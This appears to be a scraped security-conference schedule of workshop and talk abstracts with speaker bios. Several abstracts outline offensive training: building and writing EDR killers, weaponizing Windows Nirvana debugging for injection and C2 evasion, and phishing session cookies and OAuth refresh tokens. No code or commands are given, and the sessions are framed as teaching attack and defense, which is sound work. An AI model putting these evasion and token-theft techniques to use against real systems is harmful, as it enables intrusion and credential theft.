Speakers:Marcelo Ribeiro,Jeff JordanMarcelo Ribeiro leads the Offensive Security Special Ops team at Hewlett Packard Enterprise (HPE) with 20+ years of cybersecurity experience across HPE, Microsoft, IBM, and the Brazilian Navy. A former Navy Officer, he helped build Brazil’s Naval Cybersecurity capabilities and led IBM’s DFIR practice in Latin America.
At HPE, Marcelo develops advanced offensive security programs, leveraging Kubernetes infrastructure and AI to enhance offensive operations and harden cyber defenses. He has presented at DEF CON 2024 and various security conferences, sharing expertise on red teaming, cloud security, and Kubernetes exploitation.
Recognized in the EC-Council CEH Hall of Fame (2023), Marcelo holds CISSP, CISM, OSCP, GXPN, GPEN, GWAPT, GAWN, GRID, GREM, GCIH, GCIA, and more. Passionate about pushing offensive security boundaries, he thrives on tackling new adversarial challenges in modern cloud environments.
SpeakerBio: Jeff Jordan, Hewlett Packard Enterprise (HPE)Jeff Jordan is a Lead Penetration Tester in the Product Security Office with over 13 years of experience at HPE. He began his career in UEFI validation before transitioning into offensive security, where he now leads technical penetration testing efforts across a wide product portfolio. His work focuses on identifying and mitigating security risks through ethical hacking and secure development practices. Jeff has hands-on experience testing Kubernetes-based platforms, including containerized Home Subscriber Server (HSS) products used in 4G infrastructure. He holds CEH and CCSP certifications and plays a key role in driving product security strategy and execution.
- ics Calendar file
BLE CTF is a series of Bluetooth Low Energy challenges in a capture-the-flag format. It was created to teach the fundamentals of interacting with and hacking Bluetooth Low Energy services. Each exercise, or flag, aims to interactively introduce a new concept to the user.
Over the past few years, BLE CTF has expanded to support multiple platforms and skill levels. Various books, workshops, training, and conferences have utilized it as an educational platform and CTF. As an open source, low-cost of entry, and expandable education solution, BLE CTF has helped progress Bluetooth security research.
This workshop will teach the fundamentals of interacting with and hacking Bluetooth Low Energy services. Each exercise, or flag, aims to interactively introduce a new concept to the user. For this workshop, we will undergo a series of exercises to teach beginner students new concepts and allow more seasoned users to try new tools and techniques. After completing this workshop, you should have a good solid understanding of how to interact with and hack on BLE devices in the wild.
Speakers:Ryan Holeman,Alek AmraniRyan Holeman resides in Austin, Texas, where he works as the CISO for Stability AI. He is currently pursuing a Ph.D. in cyber defense from Dakota State University. He has spoken at respected venues such as Black Hat, DEF CON, Lockdown, BSides, Ruxcon, Notacon, and Shmoocon. You can keep up with his current activity, open source contributions, and general news on his blog. His spare time is mostly spent digging into various network protocols, random hacking, creating art, and shredding local skateparks.
SpeakerBio: Alek AmraniAlek Amrani is bad at expense reports.
- ics Calendar file
This workshop will teach how to start pen testing a cloud REST API. Attendees should have a fundamental knowledge of OWASP Top 10 and web application security. Attendees will learn how to setup tools (i.e. Burp) and practice on a simulated cloud environment to discover vulnerabilities in cloud REST APIs. This includes attacks in authorization, XSS, and SQL injection. Technologies such as OpenStack, Salesforce, and Google Cloud will be covered.
SpeakerBio: Rodney Beede, Principal Consultant at CoalfireRodney is a principal consultant and has specialized in cloud security for over 10 years. He has spoken at multiple conferences on topics from cloud security engineering to IoT device hacking. He has multiple CVEs for discovered web application security vulnerabilities. He started his career in enterprise web application software development but shifted to the security industry with this master's thesis research project "A Framework for Benevolent Computer Worms" 2012. Website: https://www.rodneybeede.com
- ics Calendar file
Threat actors skillfully evade automated defenses. Countering them requires more than tools; it demands human insight and the art of precise detection. In Practical YARA: Crafting Custom Rules for Targeted Malware Defense, you'll move beyond generic signatures and learn the craft of building truly effective YARA rules. This workshop focuses on translating nuanced understanding gained from malware analysis and threat intelligence into powerful, human-authored detections. Through fast-paced, hands-on labs covering static and behavioral analysis, you will master the art of identifying unique malicious characteristics and expressing them effeciently in YARA. Learn to build high-fidelity rules that supercharge threat hunting, pinpoint emerging threats, and give you confident control—skills essential in an era where quality hand-crafted detection logic provides a critical edge. Leave ready to bolster your defensive arsenal with expertise, not just automation.
Speakers:Joshua "jstrosch" Stroschein,Francisco Perdomo,Jae Young KimJoshua is an experienced malware analyst and reverse engineer and has a passion for sharing his knowledge with others. He is a reverse engineer with the FLARE team at Google, where he focuses on tackling the latest threats. He is an accomplished trainer, providing training at places such as Ring Zero, Black Hat, DEF CON, ToorCon, Hack In The Box, SuriCon, and other public and private venues. He is also an author on Pluralsight, where he publishes content around malware analysis, reverse engineering, and other security related topics.
SpeakerBio: Francisco Perdomo, GoogleFrancisco is a skilled security professional with a strong background in detection engineering and threat intelligence. With extensive blue team experience, he currently works as a Security Engineer at Google's VirusTotal Research team, where he leverages his operational expertise to investigate malware trends and create insightful technical content. Francisco's background includes roles as a SecOps Engineer, and Professor of Computer Security.
SpeakerBio: Jae Young Kim, GoogleJae Young Kim is a Senior Reverse Engineer on Mandiant's FLARE Team where he reverses malware and contributes to FLARE's automated analysis and binary similarity efforts. He is a seasoned instructor and a core contributor to FLARE’s educational content development efforts. He has a Bachelors in Computer Science from Columbia University.
- ics Calendar file
Many cybercime and APT actors kill and/or silence EDR agents in order to evade detection, allowing them to achieve their actions on objectives without notifying security teams. How do they do it? What tools do they use? How do they write those tools? What is BYOVD? If you’re interested in learning how adversaries bypass EDR platforms, this workshop is for YOU!
Every student who attends this workshop will have a personal lab environment generated for them. Using the online lab environment, students will review a live EDR tool in order to become familiar with its capabilities, logging, and more. Students will then compile and run an EDR killer used commonly by major threat groups. Next, students will execute commands to silence agent-to-tenant communication, thereby negating notification to security teams.
Following the building, use, and analysis of readily-available tools, students will learn how to write their own code to achieve similar means. We will be using a combination of pre-provided code snippets and code we write in real-time in order to both kill and silence the provided EDR agent. Are you ready to take your reverse engineering and coding skills to the next levels? – Let’s do this! And remember: #RansomwareSucks!
Speakers:Ryan "rj_chap" Chapman,Aaron "ironcat" RosenmundRyan Chapman is the author of SANS’ “FOR528: Ransomware and Cyber Extortion” course, teaches SANS’ “FOR610: Reverse Engineering Malware” course, works as a threat hunter @ $dayJob, and is an author for Pluralsight. Ryan has a passion for life-long learning, loves to teach people about ransomware-related attacks, and enjoys pulling apart malware. He has presented workshops at DefCon and other conferences in the past and knows how to create a step-by-step instruction set to maximize hands-on learning.
SpeakerBio: Aaron "ironcat" Rosenmund, Managing Director of Tradecraft and Programs at OnDefendAaron Rosenmund is an accomplished cybersecurity professional with extensive experience in various leadership roles across multiple organizations. Currently serving as the Managing Director of Tradecraft and Programs at OnDefend since September 2024, Aaron also holds a position at the National Guard Bureau as Staff Lead for the Cyber Shield Red Team, demonstrating a commitment to enhancing cybersecurity defenses. With a background that includes significant roles at Pluralsight, where responsibilities spanned content strategy and security skills development, and the Florida Air National Guard as a Lead Cyber Operator focused on defensive operations, Aaron has developed a comprehensive skill set in threat emulation, cyber system operations, and training. Additionally, past leadership positions as CEO at Aestus Industries and Vice President at Concrete Surface Innovations underscore strong management capabilities and operational expertise. Aaron holds multiple degrees in technology and cybersecurity from respected institutions, underscoring a solid educational foundation in this field.
- ics Calendar file
The Nirvana Debug is a Windows internal features existing since Windows 7. This workshop idea is to see how this feature can be weaponized in order to either: - Hijack execution flow - Perform process injection - Perform sleep obfuscation for C2 beacon
During this workshop, you will learn the main principle of Nirvana Debugging, and try to weaponize it. Some debugging, reverse and coding will be needed in order to create a new malware that will evade classic EDR solutions.
WHILE THIS IS AN INTRODUCTION TO NIRVANA HOOKING, THIS WORKSHOP IS STILL A HIGHLY TECHNICAL WORKSHOP
SpeakerBio: Yoann "OtterHacker" DEQUEKER, RedTeam Leader at WavestoneeYoann Dequeker (@OtterHacker) is a red team operator at Wavestone entitle with OSCP and CRTO certification. Aside from his RedTeam engagements and his contributions to public projects such as Impacket, he spends time working on Malware Developpement to ease beacon deployment and EDR bypass during engagements and is currently developing a fully custom C2.
His research leads him to present his results on several conferences such as LeHack (Paris), Insomni'hack, BlackAlps (Swiss) or even through a 4-hour malware workshop at Defcon31 and Defcon32 (Las Vegas). All along the year, he publishes several white papers on the techniques he discovered or upgraded and the vulnerabilities he found on public products.
- ics Calendar file
In Wi-Fi-So-Serious, we will explore setting up and troubleshooting a 802.11(Wi-Fi) assessment rig. Then, we will look at passive reconnaissance and cracking different Wi-Fi security protocols. Using the Kali Linux VM, we will set up our 802.11 cards in monitor mode and configure them to collect PCAPs. Participants will be taught the methodology and commands needed to troubleshoot wireless cards in Linux. We will work with command line tools like iw, iwconfig, hostapd, wpa_cli, and wpa_supplican along with others. Next, the course challenges participants to perform passive collections and work with Wireshark display filters. The course then covers cracking common 802.11 security protocols with Aircrack-ng, Wifite, Airgeddon, Reaver, and Wacker.The Wi-Fi-So-Serious workshops concludes with a Capture The Flag (CTF) so that participants can apply the course content with hands on keyboard. Participants will also learn how to set up a lab they can take home with them
Speakers:James Hawk,Brian BurnettJames Hawk (He/Him) is a Principal Consultant with Google Public Sector within Proactive Services. He is the wireless subject matter expert for his team. James has led and contributed to numerous assessments (Red Teams and Pen Tests). He has developed internal training and tool updates for 802.11 for his company. James is a 20-year veteran of the U.S. Army and has over 10 years of hands-on experience in wireless technologies. James is constantly researching/testing 802.11 attacks against his home lab. He is a fan of hockey, LetterKenny, and almost anything sci-fi.
SpeakerBio: Brian Burnett, Founder of Offensive Technical SolutionsBrian Burnett is the founder of Offensive Technical Solutions (OTS) where he conducts web-application, internal network, and cloud penetration tests. Prior to founding OTS, he served five years in the United States Army, followed by seven years supporting internal teams at Fortune 500 companies. Brian holds degrees in computer science, pentesting, theology, and Russian. He enjoys tinkering with his homelab, collecting certifications, and committing poorly written code. His hobbies include Brazilian Jiu-Jitsu, purchasing unnecessary power tools, and CrossFit.
- ics Calendar file
Since our sold out class in 2024, we have refreshed the material to incorporate not only Agentic AI but Content Augmentation Generation (CAG)!
Have you ever wondered how the pros use AI to solve their complex cybersecurity problems? Come find out!
Artificial Intelligence (AI) and Large Language Models (LLMs) have emerged as robust and powerful tools that have redefined how many approach problem solving. The last few years have seen industry AI interest surge while Cybersecurity experts struggle not only to threat model LLMs but to leverage them effectively. Our training presents a comprehensive educational framework aimed at equipping students with the necessary skills to not only build their own LLM toolkits but to leverage AI and LLMs to build elegant solution to solve complex problems unique to their own environments.
This class will teach students how to build their own AI frameworks to ingest data from either SaaS or on-prem data lakes. We will provide both the tools for data data consumption but as well as data warehousing. From there we will walk students through transforming this data and making it operationally effective and efficient for their AI. We will cover various types of data common to Cybersecurity environments, protentional issues with certain data types, and how to make the most of opensource to help transform the data. We will also touch on training and LoRA for model customization.
As Cybersecurity experts, we also need to understand the risk that comes with the use of AI. For this purpose, we will discuss foundational knowledge to conduct both red and blue team exercises regarding AI. We will discuss risk analysis of the disparate components used to make AI functional, a holistic and functional approach to defending the supply chain, understanding vulnerability analysis, and modern day adversary attacks and techniques that you will encounter. Understanding modern security policy frameworks is just as important and we will cover a few of the popular frameworks used to secure and apply policy to your AI environment. We will cap this section of class off with a practicum of both attacking and defending our AI deployed in class.
Using the tools created in class, we will use the SOCMAN DEF CON model to solve hand-picked operational problems we have seen teams struggle with all over the world. You will learn how to use LLMs with agentic AI, how to augment our queries with our own data in two different methods (RAG/CAG), generate high quality YARA/SIGMA rules using your own data, tune your model to hunt complex patterns, improve application observability by adding context to "weird" behavior, how to hunt for APTs using real world scenarios and logs (Stuxnet), filter out noise to increase signal in your environment (SNR), and much more! All of these labs will be performed by students and will leverage AI as middleware to add contextual data between disparate platforms to solve your complex cybersecurity problems. All use cases will be performed by students live and in-class.
By the end of this training you will be able to:
Michael Glass AKA "Bluescreenofwin" is currently a Principal Security Engineer providing security leadership for one of the largest streaming technology companies in the world specializing in Blue Team, SecOps, and Cloud. Michael has been in the hacking and security scene for over 15 years working for a wide variety of organizations including government, private, and non-profit. Using this diverse background he has founded the company "Glass Security Consulting" in order to provide world class Cybersecurity instruction for Information Security Professionals and Hackers alike.
- ics Calendar file
Since our sold out class in 2024, we have refreshed the material to incorporate not only Agentic AI but Content Augmentation Generation (CAG)!
Have you ever wondered how the pros use AI to solve their complex cybersecurity problems? Come find out!
Artificial Intelligence (AI) and Large Language Models (LLMs) have emerged as robust and powerful tools that have redefined how many approach problem solving. The last few years have seen industry AI interest surge while Cybersecurity experts struggle not only to threat model LLMs but to leverage them effectively. Our training presents a comprehensive educational framework aimed at equipping students with the necessary skills to not only build their own LLM toolkits but to leverage AI and LLMs to build elegant solution to solve complex problems unique to their own environments.
This class will teach students how to build their own AI frameworks to ingest data from either SaaS or on-prem data lakes. We will provide both the tools for data data consumption but as well as data warehousing. From there we will walk students through transforming this data and making it operationally effective and efficient for their AI. We will cover various types of data common to Cybersecurity environments, protentional issues with certain data types, and how to make the most of opensource to help transform the data. We will also touch on training and LoRA for model customization.
As Cybersecurity experts, we also need to understand the risk that comes with the use of AI. For this purpose, we will discuss foundational knowledge to conduct both red and blue team exercises regarding AI. We will discuss risk analysis of the disparate components used to make AI functional, a holistic and functional approach to defending the supply chain, understanding vulnerability analysis, and modern day adversary attacks and techniques that you will encounter. Understanding modern security policy frameworks is just as important and we will cover a few of the popular frameworks used to secure and apply policy to your AI environment. We will cap this section of class off with a practicum of both attacking and defending our AI deployed in class.
Using the tools created in class, we will use the SOCMAN DEF CON model to solve hand-picked operational problems we have seen teams struggle with all over the world. You will learn how to use LLMs with agentic AI, how to augment our queries with our own data in two different methods (RAG/CAG), generate high quality YARA/SIGMA rules using your own data, tune your model to hunt complex patterns, improve application observability by adding context to "weird" behavior, how to hunt for APTs using real world scenarios and logs (Stuxnet), filter out noise to increase signal in your environment (SNR), and much more! All of these labs will be performed by students and will leverage AI as middleware to add contextual data between disparate platforms to solve your complex cybersecurity problems. All use cases will be performed by students live and in-class.
By the end of this training you will be able to:
Michael Glass AKA "Bluescreenofwin" is currently a Principal Security Engineer providing security leadership for one of the largest streaming technology companies in the world specializing in Blue Team, SecOps, and Cloud. Michael has been in the hacking and security scene for over 15 years working for a wide variety of organizations including government, private, and non-profit. Using this diverse background he has founded the company "Glass Security Consulting" in order to provide world class Cybersecurity instruction for Information Security Professionals and Hackers alike.
- ics Calendar file
Bug bounty hunting is often portrayed as methodical recon, crafted payloads, and targeted testing. But sometimes, the most interesting vulnerabilities don’t come from planned attacks — they come from the chaos. In this talk, I’ll walk through a handful of real bugs I’ve reported over the years that found me instead. From unexpected blind XSS triggers in places I wasn’t even actively testing, to getting quietly added to internal distribution lists and receiving sensitive data I never asked for, to those classic “WTF” moments that every seasoned hunter has experienced — this talk highlights the unpredictable and serendipitous side of bug bounty.
We’ll explore how these moments happened, what they revealed about the systems in question, and what they taught me about staying alert beyond traditional recon. Whether you’re an experienced hunter or just getting started, this talk is a reminder that in bug bounty, sometimes the best findings aren’t hunted — they’re stumbled into.
SpeakerBio: Jasmin "JR0ch17" LandryJasmin Landry is a seasoned ethical hacker and full-time bug bounty hunter who has reported hundreds of security vulnerabilities to some of the world’s largest tech companies. After years leading cybersecurity efforts as Senior Director of Information Security at Nasdaq, Jasmin returned to his roots in hacking — now focusing exclusively on uncovering critical bugs through bug bounty platforms. Recognized at multiple live hacking events for top findings, he brings a sharp eye for unexpected issues and a deep understanding of modern attack surfaces. He’s also a co-leader of OWASP Montréal and an active voice in the security research community.
- ics Calendar file
Launch into the thrilling world of cybersecurity, specifically designed for space systems! Learn the fundamentals to safeguard ground stations, communication links, and spacecrafts.
Engage in an immersive and fun CTF scenario. Apply your cybersecurity skills in real-time and see the direct impact of your decisions on our Space Systems Demonstrator. In this high-stakes scenario, you'll align with the Aurora Alliance in their critical mission to thwart Count Viktor Thunderclaw and the notorious Nebula Syndicate. The Syndicate threatens to destroy historic monuments around the world with their Space Laser unless their demands are met. Do you have what it takes to dismantle their malevolent plans?
Our beginner-level CTF kicks off as soon as the village opens—no pre-registration necessary. Just bring your laptop to access the CTF platform and your favorite packet decoding software (i.e. Wireshark). Expect the CTF to take you less than 1 hour to complete. Team collaboration is encouraged, and if you encounter obstacles, numerous hints are available to guide you. Excel in the challenge, and you could walk away with a CT Cubed SAO, an exclusive prize while supplies last.
- ics Calendar file
Opportunities in InfoSec are everywhere, but they’re often buried across scattered websites, social media posts, or chat channels. Whether it’s a local meetup, a CFP deadline, a volunteer opportunity, or the chance to sponsor an initiative, many people and organizations miss out simply because they don’t know where to look or find info bloated by pay-to-play noise.
InfoSecMap was created to solve this. It’s a free, community-driven platform that brings the global InfoSec ecosystem together in one place. From major conferences to CTFs and grassroots meetups, InfoSecMap helps users explore what’s happening by geographic region or focus area and discover where they can connect and contribute.
InfoSecMap is proud to partner with OWASP, bringing together volunteer-led chapters and global events while fostering stronger connections and community growth. We believe open source should mean open access, and we’re building the infrastructure to make that real.
SpeakerBio: W. Martín Villalba, C13 SecurityMartín is an application and product security consultant with over 15 years of industry experience. He founded C13 Security, where he specializes in Secure SDLC, pentesting, and vulnerability management. He is an active member of the InfoSec community, collaborating with local groups and global organizations such as BSides and OWASP. He also built InfoSecMap, an open-access platform for discovering InfoSec events and communities from all around the world.
- ics Calendar file
Spotter is a groundbreaking open-source tool designed to secure Kubernetes clusters throughout their lifecycle. Built on the native tooling of Kubernetes by leveraging Common Expression Language for policy definitions, we can define unified security scanning across development, CLI, CI/CD, admission controllers, deployments, runtime, and continuous monitoring. Its unique approach enables both enforcement and monitoring modes, ensuring that policies can be applied consistently and mapped directly to industry standards such as CIS and MITRE ATT&CK. Spotter provides extremely high flexibility across all Kubernetes phases, providing an innovative approach that no other open-source or commercial solution can replicate. It seamlessly bridges security, DevOps, and platform teams, effectively solving the real-world challenges faced by day-to-day operations.
SpeakerBio: Madhu "madhuakula" Akula, Pragmatic Security LeaderMadhu Akula is a pragmatic security leader and creator of Kubernetes Goat, an intentionally vulnerable by design Kubernetes Cluster to learn and practice Kubernetes Security. Also published author and Cloud Native Security Architect with extensive experience. Also, he is an active member of the international security, DevOps, and Cloud Native communities (null, DevSecOps, AllDayDevOps, AWS, CNCF, USENIX, etc). He holds industry certifications like CKA (Certified Kubernetes Administrator), CKS (Certified Kubernetes Security Specialist), OSCP (Offensive Security Certified Professional), etc.
Madhu frequently speaks and runs training sessions at security events and conferences around the world including DEFCON 24, 26, 27, 28, 29 & 30, BlackHat 2018, 19, 21 & 22, USENIX LISA 2018, 19 & 21, SANS Cloud Security Summit 2021 & 2022, O’Reilly Velocity EU 2019, Github Satellite 2020, Appsec EU (2018, 19 & 22), All Day DevOps (2016, 17, 18, 19, 20 & 21), DevSecCon (London, Singapore, Boston), DevOpsDays India, c0c0n(2017, 18), Nullcon 2018, 19, 21 & 22, SACON, Serverless Summit, null and multiple others.
His research has identified vulnerabilities in over 200+ companies and organizations including; Google, Microsoft, LinkedIn, eBay, AT&T, WordPress, NTOP, Adobe, etc. and is credited with multiple CVE’s, Acknowledgements, and rewards. He is co-author of Security Automation with Ansible2 (ISBN-13: 978-1788394512), which is listed as a technical resource by Red Hat Ansible. He is the technical reviewer for Learn Kubernetes Security, Practical Ansible2 books by Packt Pub. Also won 1st prize for building an Infrastructure Security Monitoring solution at InMobi flagship hackathon among 100+ engineering teams.
- ics Calendar file
Spotter is a groundbreaking open-source tool or solution designed to secure Kubernetes clusters throughout their lifecycle. Built on the native tooling of Kubernetes by leveraging CEL (Common Expression Language) for policy definitions, we can define unified security scanning across development, CLI, CI/CD, Admission Controllers, deployments, runtime, and continuous monitoring. Its unique approach enables both enforcement and monitoring modes, ensuring that policies can be applied consistently and mapped directly to industry standards such as CIS, MITRE ATT&CK, etc.
Spotter provides extreamly high flexbility across all Kubernetes phases, providing an innovative approach that no other open-source or commercial solution can replicate. It seamlessly bridges security, DevOps, and platform teams, effectively solving the real-world challenges faced by day-to-day operations.
SpeakerBio: Madhu "madhuakula" Akula, Pragmatic Security LeaderMadhu Akula is a pragmatic security leader and creator of Kubernetes Goat, an intentionally vulnerable by design Kubernetes Cluster to learn and practice Kubernetes Security. Also published author and Cloud Native Security Architect with extensive experience. Also, he is an active member of the international security, DevOps, and Cloud Native communities (null, DevSecOps, AllDayDevOps, AWS, CNCF, USENIX, etc). He holds industry certifications like CKA (Certified Kubernetes Administrator), CKS (Certified Kubernetes Security Specialist), OSCP (Offensive Security Certified Professional), etc.
Madhu frequently speaks and runs training sessions at security events and conferences around the world including DEFCON 24, 26, 27, 28, 29 & 30, BlackHat 2018, 19, 21 & 22, USENIX LISA 2018, 19 & 21, SANS Cloud Security Summit 2021 & 2022, O’Reilly Velocity EU 2019, Github Satellite 2020, Appsec EU (2018, 19 & 22), All Day DevOps (2016, 17, 18, 19, 20 & 21), DevSecCon (London, Singapore, Boston), DevOpsDays India, c0c0n(2017, 18), Nullcon 2018, 19, 21 & 22, SACON, Serverless Summit, null and multiple others.
His research has identified vulnerabilities in over 200+ companies and organizations including; Google, Microsoft, LinkedIn, eBay, AT&T, WordPress, NTOP, Adobe, etc. and is credited with multiple CVE’s, Acknowledgements, and rewards. He is co-author of Security Automation with Ansible2 (ISBN-13: 978-1788394512), which is listed as a technical resource by Red Hat Ansible. He is the technical reviewer for Learn Kubernetes Security, Practical Ansible2 books by Packt Pub. Also won 1st prize for building an Infrastructure Security Monitoring solution at InMobi flagship hackathon among 100+ engineering teams.
- ics Calendar file
Overview of advancements in token exploitation techniques
OAuth 2.0 authorization framework overview
Access tokens vs. refresh tokens: purpose and security implications
How QR codes facilitate social engineering
User psychology and trust in QR authentication processes
Family of Client ID (FOCI) explanation
Token relationships and privilege escalation paths
Architecture and components overview
Configuration and customization options
Broker authentication client phishing implementation and template
Automatic registration of Primary Refresh Tokens
Detection via logging and SIEM rules
Throughout his career in information security, Nevada has experience in various roles, including security analyst, security architect, penetration tester, and security researcher. He is currently a Senior Security Researcher on the NG-SIEM Threat Research team at CrowdStrike.
SpeakerBio: Kam TalebzadehKam is a security consultant and security researcher. He has developed and published several open-source offensive toolkits including o365spray, BridgeKeeper, and redirect.rules. He is currently a Professional Services Senior Consultant with the Cloud Red Team Blue Team at CrowdStrike.
- ics Calendar file
At DEF CON 24, an SSH honeypot on the open network held a puzzle that would go on to inspire the first Walkthrough Workshop. Although the Walkthrough Workshops at the Packet Hacking Village no longer feature Cowrie, its echoes live on at DEF CON. Out of the box, Cowrie is a medium-interaction SSH honeypot, but this level of interaction can be raised with a little elbow grease. From custom commands and adventure games to file systems laid out as spatial cubes, this talk explores several years of Cowrie-based challenges that will bash your expectations of terminal interaction.
SpeakerBio: Ryan Mitchell, Principal Software Engineer at Gerson Lehrman GroupRyan Mitchell is a staff member at the Packet Hacking Village and the author of Unlocking Python (Wiley), Web Scraping with Python (O’Reilly), and multiple courses on LinkedIn Learning including Python Essential Training. She holds a master’s degree in software engineering from Harvard University Extension School and has worked as principal software engineer and data scientist on the search and artificial intelligence teams at the Gerson Lehrman Group for the last six years.
- ics Calendar file
Step into the IoT Village and challenge those eyes staring at you. Break open real hardware and dive in to uncover vulnerabilities.
Try your luck to emulate those devices. Whether you’re a hardware hacking pro of just a hardware wrecker, this hands-on experience is your change to push the limits of hardware hacking.
Ready to see what’s really watching you?
- ics Calendar file
Starts at 10am on Friday and ends at 1200 on Saturday with prizes awarded immediately afterward.
- ics Calendar file
Join a live recording of the Absolute AppSec Podcast for a panel discussion with industry experts as they discuss the current state of application, product, and AI security for 2025. Spicy questions and takes will be welcome (if not encouraged).
Speakers:Seth Law,Jason "jhaddix" Haddix,Ken "cktricky" Johnson,Tanya "SheHacksPurple" JancaSeth Law is the Founder and Principal Consultant of Redpoint Security (redpointsecurity.com). Over the last 20 years, Seth has worked within multiple security disciplines, including application development, cloud architecture, and network protection, both as a manager and individual contributor. Seth has honed his security skills using offensive and defensive techniques, including tool development and security research. His understanding of the software development lifecycle and ability to equate security issues to development tasks has allowed him to speak at conferences ranging from Blackhat and DEF CON to local security meetups. In his spare time, Seth revels in deep-level analysis of programming languages and inherent flaws, develops the iOS version of HackerTracker, and co-hosts the Absolute AppSec podcast with Ken Johnson.
Seth utilizes LLMs heavily in his work and has a wealth of real world applicable skills to share in applying LLMs to the application security domain.
SpeakerBio: Jason "jhaddix" Haddix, Field CISO at flare.ioJason has had a distinguished 20-year career in cybersecurity, previously serving as CISO of Buddobot, CISO of Ubisoft, Head of Trust/Security/Operations at Bugcrowd, Director of Penetration Testing at HP, and Lead Penetration Tester at Redspin.
He has also held positions doing mobile penetration testing, network/infrastructure security assessments, and static analysis.
Jason is a hacker, bug hunter, and is currently ranked 57th all-time on Bugcrowd's bug bounty leaderboards. Currently, he specializes in recon, web application analysis, and emerging technologies.
Jason has also authored many talks for world-renowned conferences like DEF CON, Bsides, Black Hat, RSA, OWASP, Nullcon, SANS, IANS, BruCon, ToorCon, and many more.
Jason Haddix AKA jhaddix is the CEO and “Hacker in Charge” at Arcanum Information Security. Arcanum is a world class assessment and training company.Jason has had a distinguished 20-year career in cybersecurity previously serving as CISO of Buddobot, CISO of Ubisoft, Head of Trust/Security/Operations at Bugcrowd, Director of Penetration Testing at HP, and Lead Penetration Tester at Redspin. He has also held positions doing mobile penetration testing, network/infrastructure security assessments, and static analysis. Jason is a hacker, bug hunter and currently ranked 57st all-time on Bugcrowd’s bug bounty leaderboards. Currently, he specializes in recon, web application analysis, and emerging technologies. Jason has also authored many talks on offensive security methodology, including speaking at cons such as DEFCON, Besides, BlackHat, RSA, OWASP, Nullcon, SANS, IANS, BruCon, Toorcon and many more.
SpeakerBio: Ken "cktricky" Johnson, Co-Founder and CTO at DryRun SecurityKen Johnson, has been hacking web applications professionally for 16 years. Ken is both a breaker and builder and is the CTO & Co-Founder of DryRun Security. Previously, Ken was a Director with GitHub's Product Security Engineering team and has held both technical and leadership roles both within the consulting world as well as a corporate defender. Previously, Ken has spoken about varying AppSec topics at RSA, You Sh0t the Sheriff, Insomnihack, CERN, DerbyCon, AppSec USA, AppSec DC, AppSec California, OWASP Global events, DevOpsDays DC, LASCON, RubyNation, and numerous other events. Ken's current passion project is the Absolute AppSec podcast with Seth Law and the practical secure code review course they offer thru DEF CON and other training venues.
Ken utilizes LLMs heavily in his work and has a wealth of real world applicable skills to share in applying LLMs to the application security domain.
SpeakerBio: Tanya "SheHacksPurple" Janca, Security Advocate at SemgrepTanya Janca, aka SheHacksPurple, is the best-selling author of 'Alice and Bob Learn Secure Coding', 'Alice and Bob Learn Application Security’ and the ‘AppSec Antics’ card game. Over her 28-year IT career she has won countless awards (including OWASP Lifetime Distinguished Member and Hacker of the Year), spoken all over the planet, and is a prolific blogger. Tanya has trained thousands of software developers and IT security professionals, via her online academies (We Hack Purple and Semgrep Academy), and her live training programs. Having performed counter-terrorism, led security for the 52nd Canadian general election, developed or secured countless applications, Tanya Janca is widely considered an international authority on the security of software. Tanya currently works at Semgrep as a Security Advocate.
- ics Calendar file
The U.S. Center for AI Standards and Innovation (CAISI) facilitates testing and collaborative research related to harnessing and securing the potential of commercial AI systems. This talk will focus on CAISI's experience evaluating the cyber capabilities and security of frontier AI models, with a particular focus on evaluations of agentic AI systems with tool-use capabilities. It will cover lessons learned from conducting these evaluations, including methodological considerations for performing model evaluations and insights into AI systems' evolving capabilities and vulnerabilities, as well as takeaways for how evaluations can support the adoption of AI systems and the readiness of U.S. critical infrastructure and government to defend against cyber threats.
SpeakerBio: Maia Hamin, Member of Technical Staff at U.S. Center for AI Standards and Innovation (CAISI)
- ics Calendar file
The maritime industry is rapidly digitizing, but how well is it securing its foundational digital infrastructure? In this talk, we present the results of a large-scale passive reconnaissance effort targeting the top 50 global maritime organizations—leveraging only open source intelligence (OSINT) and LLM-assisted analysis. By focusing on core security controls such as DNS, email authentication protocols, and other foundational internet services, we uncover a troubling landscape. All data was collected non-intrusively and ethically, relying exclusively on public data. Results will be presented in an anonymized and aggregated fashion, with a strong emphasis on reproducibility. In true hacker village spirit, we will release all scripts and tools used—empowering attendees to replicate the analysis, audit other industries, or expand upon our methodology. This session will not only highlight the maritime sector’s digital weaknesses but also demonstrate how anyone with OSINT skills and curiosity can surface meaningful insights about critical industries—with zero packets sent to the targets.
Speakers:Vlatko Kosturjak,MJ CasadoVlatko Kosturjak serves as the VP of research at Marlink Cyber, boasting over two decades of dedicated experience in the realms of information security and cybersecurity. His diverse roles over the years have not only equipped him with a comprehensive understanding of security governance but also delved into the deep technical side of security. He have successful M&A experience in different fields of cyber security including application security.
Vlatko finds joy in both breaking and building security controls. Beyond his commitment to security, he harbors a deep passion for open and free software. This passion has manifested in the creation of numerous popular open-source offensive tools and contributions to various renowned free security software projects.
Throughout his extensive career and in his continuous pursuit of knowledge in the dynamic field of cybersecurity, Vlatko has acquired a long array of certifications, including CISSP, OSCP, CISM, and many more.
SpeakerBio: MJ Casado
- ics Calendar file
The workshop revolves around phishing techniques to capture yummy cookies & refresh tokens against highly targeted Identity Providers. Instead of using server based infrastructure, we will use server-less infra to launch stealth attacks rotating trusted implicit domains & integration directly with the productivity apps like slack, teams etc.
The flow of the workshop :
Workshop Duration : 120 Minutes
Speakers:Manish Gupta,Yash BharadwajManish Gupta is Director of CyberWarFare Labs having 7.5+ years of expertise in offensive Information Security. Where he specializes in Red Teaming Activities on enterprise Environment. His Research interest includes Real World Cyber Attack Simulation and Advanced persistent Threat (APT). Previously he has presented his research at reputed conferences like Blackhat USA, DEFCON, Nullcon, BSIDES Chapters, X33fcon, NorthSec & other corporate trainings etc.
SpeakerBio: Yash BharadwajYash Bharadwaj is a seasoned technologist with over 7.5 years of experience, currently serving as the Technical Director & Head of R&D at CyberWarfare Labs. Passionate about offensive security, he specializes in uncovering and analyzing emerging TTPs, building Red/Blue team infrastructure and simulating Identity Based Attacks. A sought-after speaker, he has conducted hands-on training & delivered talks at prestigious conferences such as BlackHat (USA, Asia, EU), Nullcon, X33fCon, NorthSec, and various BSides chapters. A recognized thought leader, he combines technical depth with business-aligned security leadership
- ics Calendar file
You've seen us swamp chillout areas guerilla style with tables full of stickers, but now we finally got our act together and have a formal place and time. Come swap stickers, chat with creators, and join the growing subculture of sticker lovers. Follow @dcstickerswap on Twitter for updates.
- ics Calendar file
Come stop by for our first offical event where we will have custom stickers for VX Underground, Skyhopper, and more!
